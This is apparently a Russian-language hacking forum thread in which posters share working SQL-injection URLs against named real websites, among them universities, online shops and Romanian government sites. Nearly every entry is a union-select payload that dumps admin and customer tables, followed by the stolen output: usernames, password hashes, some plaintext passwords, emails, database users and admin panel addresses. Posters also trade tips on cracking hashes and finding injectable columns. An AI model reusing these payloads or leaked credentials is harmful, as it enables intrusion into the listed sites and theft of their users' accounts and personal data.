http://www2.umaine.edu/graduate/article.php?id=63'+union+select+1,aes_decrypt(aes_ encrypt(concat_ws(0x3a,password),0x71),0x71),3,4+f rom+rec_passwords+where+id=40+limit+1,1/*

Hampshire.edu PR7 - Сладкая Еда, кому надо тот ест.)
http://www.hampshire.edu/cms/index.php?id=1+union+select+1/*

LUKAC, разкрутил..)
http://www.bigshoebazaar.com/showprod.php?prcd=2422+union+select+concat_ws(0x3a ,emailadd,cpwd,acc_crdt,0x2e)+from+customer/*

едушки
http://cahfs.ucdavis.edu/show.php?id=-1
http://spa.american.edu/pages.php?ID=1'
http://www.metropolitan.edu/news/newsdetail.php?id=309'
http://cils.exploratorium.edu/cils/page.php?ID=1'

и еще
http://www.cityofgod.org/music/albums.php?id=1'

http://www.aquasystems.md/readarticle.php?id=34+union+select+1,table_name,3+ from+information_schema.tables/*
P.S.За интересовала таблица ROUTINES, ну вобщем юзайте.

http://www.avia.ru/safety/?id=17'
P.S.PostgreSQL

http://fevralka.ru/

http://fevralka.ru/index.php?p=gallerypic&img_id=-156+union+select+1,2,3,Column_name,5,6,7,8,9+from+ information_schema.columns+where+table_name=char(1 07,111,111,98,105,52,95,117,115,101,114)+limit+16, 1--&galid=8&area=1

http://fevralka.ru/index.php?p=gallerypic&img_id=-156+UNION+SELECT+1,2,3,TABLE_NAME+,5,6,7,8,9+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+79,1--&galid=8&area=1

http://fevralka.ru/index.php?p=gallerypic&img_id=-156+union+select+1,2,3,concat_ws(char(124),uname,p ass),5,6,7,8,9+from+koobi4_user+limit+0,1--&galid=8&area=1

Fevralka|5d22b1855e0d9dd5eedf29d80fad4b04
361557736155773615577

Хом сайт симпотичной девушки ))

Обратите внимание на пороль скорее всего домашний телефон (Это если девушка пригленнеться ))))

Вот жмоты не кто даже бала не добавили (((

http://www.the213.net/php/article.php?id=-796+uni on+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82/*
скоко нашол))скулей а анти бойан прошла токо эта :'(

Сегодня у нас .nl

PR - 7

http://www.hupo2008.nl/index.php?ID=-227+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Не стал крутить, так как всетки ПР хороший - кому надо, тот сам раскрутит ;)


PR - 6

http://www.tinbergen.nl/fellows.php?id=-172+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,concat_ws(0x3a,id,name,password),19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,concat_ws(0x3a,user(),version(),database( )),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86+from+adminacc ounts/*

Много хороших таблиц нашел - кому надо, опять таки же, раскопает. Много юзеров там )
adminaccounts {id, email, password .... }
user {user, password ... }


1:walther::7557c6b03f224601:gorilla
Как видно - это админ. Админку не искал ))

root@localhost:5.0.45:ti_database


PR - 5

http://cata.montevideo.nl/artist.php?id=3+order+by+5/*

Разберетесь :)


PR - 5

http://www.technepress.nl/publications.php?id=-13+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19/*

technepress@10.0.0.49:4.1.22-log:technepress


PR - 5

http://www.bispublishers.nl/bookpage.php?id=-92+union+select+1,2,concat_ws(0x3a,id,name,passwor d),concat_ws(0x3a,user(),version(),database()),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37+from+user s/*

1:jerry:a804942b62c5ad042450ce2c7a586f16:fl2sh - Админ.

http://www.bispublishers.nl/admin/ - Админка.

eholla_bisa@wh-www23.xs4all.nl:5.0.26-log:eholla_bis


PR - 4

http://www.audioarts.nl/getNews.php?ID=-19+union+select+concat_ws(0x3a,id,username,passwor d),concat_ws(0x3a,user(),version(),database())+fro m+users/*

1:MichaelTiel:7778da162a13f837dd1c592d61ac6fed - Админ.

audioarts@localhost:5.0.24a-Debian_9ubuntu2.4:audioarts


Большое спасибо сервису - hashcracking.info

Очень попрошу - без дефейсов.

www.bamberg.de


http://www.bamberg.de/regionaldb/combosearch.phtml?id=-1+union+select+1,table_name,3,4,5+from+information _schema.tables/*


www.systemxkayak.co.uk

http://www.systemxkayak.co.uk/gear_list_brand.php?brandID=1+union+select+1,2,3,c oncat_ws(0x3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13/*

pepperpod.de

http://pepperpod.de/cast.php?c=4&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37/*

http://pepperpod.de/cast.php?c=4&id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37+from+information_schema. tables+limit+20,1/*

softjoys.ru
http://academy.softjoys.ru/?pid=61&cid='+UNION+SELECT+1,2,3,4,5,6,7,8,9,USER(),DATABA SE(),VERSION(),13,14,15,16/*

www.inbiworld.com shop какой-то


http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,nombre,passw ord,email)+from+usersshop/*


asia:kruta
http://www.inbiworld.com/shop/

http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+hemp_costumers+where+id=3/*


http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+idpress_costumers+where+id=1/*



http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+memb_members/*



http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,nombre,passw ord,email)+from+usersinbi+limit+1,1/*



http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+wom_users/*



http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,AdminUsernam e,AdminPassword)+from+tblAdminUsers/


админы

inbiadmin:bagua
roman:inbi_au
tom:taichi

но админки не нашёл (

www.vmth.ucdavis.edu

http://www.vmth.ucdavis.edu/forms/emailform.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2/*

PhotoUa.Net - Фото Украины

http://www.photoua.net/show_ua.php?cur_cat_id=-1+union+select+1,concat_ws(0x3a,username,user_pass word,user_email),3,4,5+from+phpbb_users+where+user _id=2/*

Ruslan:851bdb204959a3667778e19dba686c5d:admin@phot oua.net

millionchik.ru Миллиончик

http://www.millionchik.ru/index.php5?module=company&cId=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,version(),user(),database()),0x71),0x71),3,4 ,5,6,7/*

http://www.ndfeb.ru/news.php?act=news&num=-53+union+select+1,2,3,4,5,6,concat_ws(char(124),us er,password)+from+user+limit+0,1/*

http://www.ndfeb.ru/admin

Admin|379f51227aa6aef0
tubgtn
А теперь вопрос. как зайти в админку?
Я думал имея логин и пас хватит что бы попасть аказалось не так кто сможет попасть скиньте. Уж больно интерестная админка.

http://www.1class.aero/strana.php?id=-230+union+select+1,2,login,4,email,6,7,8,9,user(), 11,12,13,14,15+from+1class_admin--
имя колонки с паролем не подобрал :-/

Pr=5, CMS=koobi
http://www.sequa.de/index.php?categ=-1+union+select+1,2,3/*&parent=0&p=downloads&area=1

Не смог подобрать имя таблицы, вот и выложил на паблик.(P.S. обычно kpro_user kpro6_user kpro5_user и т.д.)

.ro

Времени нету почти, поэтому не все докрутил. Где блок стоит на вывод или на union сами разберетесь, кому надо )
Не везет что-то сегодня - все мускулы 4ые :(

PR - 3

http://www.dapnl-pd.ro/docpage.php?id=24+order+by+1/*


PR - 4

http://www.ieas.ro/noutatii.php?id=-83+union+select+concat_ws(0x3a,user(),version(),da tabase())/*

whieas@localhost:4.1.20-log:whieas


PR - 4

http://www.finearts.ro/lucrare.php?id=-185+Union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, user(),version(),database()),11,12,13,14,15,16/*

finearts_ro@localhost:4.1.22-standard:finearts_ro


PR - 4

http://www.narcisvirgiliu.ro/detail.php?id=-10+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4/*

narcis@localhost:4.1.22-standard-log:narcis_nv

1:narcis:12uiligriv21
Админ.

www.narcisvirgiliu.ro/admin/ - Админка.


PR - 4

http://www.atdr.ro/index.php?id=-274+union+select+1,2,3,4,5,6,7,8,9,10,11/*



PR - 4

http://www.prefecturatimis.ro/comunicate_articol.php?id=-1544+union+select+1,2,3,4,5,6/*


PR - 5


http://www.bcucluj.ro/english/detalii.php?id=-17832+union+select+1,2,3,4,5,6,7/*


PR - 5

http://proiecte.nipne.ro/pn2/index_en.php?id=-14+union+select+concat_ws(0x3a,user(),version(),da tabase())/*


conusr@localhost:4.1.20:pncdi2

Admin.pass - 556eba5e26cdd0e1


PR - 5

http://www.apd.ro/publicatie.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*



PR - 5

http://www.primet.ro/capital_sector.php?ID=-36+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3/*


PRIMET@LOCALHOST:5.0.44:PRIMET

Без дефейсов пожалуйста )

http://parovoz.com/thisday/comment.php?ID=29'
http://www.cyclonaire.com/accessoriesresults.cfm?ID=29'
http://dscripts.awardspace.com/scripts.php?id=29+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13/*
Раскрутить нету времени,так что извеняйте...
З.Ы.спасибо за внимание.

#urbaner
http://parovoz.com/thisday/comment.php?ID=29'+union+select+unhex(hex(concat_w s(0x3a,login,password,email))),2+from+gallery.auth ors+where+id=1+limit+1,1/*
http://parovoz.com/thisday/comment.php?ID=29'+union+select+unhex(hex(concat_w s(0x3a,id,name,password))),2+from+gallery.rrr1+lim it+1,1/*
хек.

Вот смог развить инъекцию, налетай))
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,concat(name,%20char(58 ),name2,char(58),name3,char(58),passw,char(58),pol ice,char(58),birthday,char(58),email,0x3C62723E)+F ROM+author_tbl+limit+0,1000/*
Мыла, логины, пароли, вся пачка.

Вот имена таблиц:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,TABLE_NAME+FROM%20INFO RMATION_SCHEMA.TABLES+limit+1,30/*

Колонки в author_tbl
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,COLUMN_NAME+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x617574686 F725F74626C+limit+0,20/*

PS Если что не так, не бейте сильно, я изучаю SQLINJ всего лишь четвертый день((

http://www.kino.ru/cinema.php?id=10+union+select+1,2,3,4,5,6,7/*
Блин,не могу найти поля для вывода:(

P.S.Блин а де она,(1) в упор не вижу..

#urbaner
{1},2,3,4,5,6

4.1.22-standard-log
u6635_1
u6635_1@localhost

#urbaner нужно переходит к несуществующим значениям параметра

http://www.kino.ru/cinema.php?id=-10+union+select+1,2,3,4,5,6,7/*
http://www.kino.ru/cinema.php?id=99999999999999+union+select+1,2,3,4, 5,6,7/*

или так

http://www.kino.ru/cinema.php?id=10+and+10=0+union+select+1,2,3,4,5,6 ,7/*

[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.columns/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.tables/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+mysql.user/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+dual/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+phpbb_users/*

Хотел было заказать себе домик в Голландии через это агентство, ну да ладно. =)

http://www.pandzoeker.nl/-housingonline/

http://www.pandzoeker.nl/-housingonline/view.php?id=15050+union+select+1,2,3,4,5,6,7,8,con cat_ws(char(58),username,password),10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80+fr om+users/*
Ник: otto
Пароль: victor1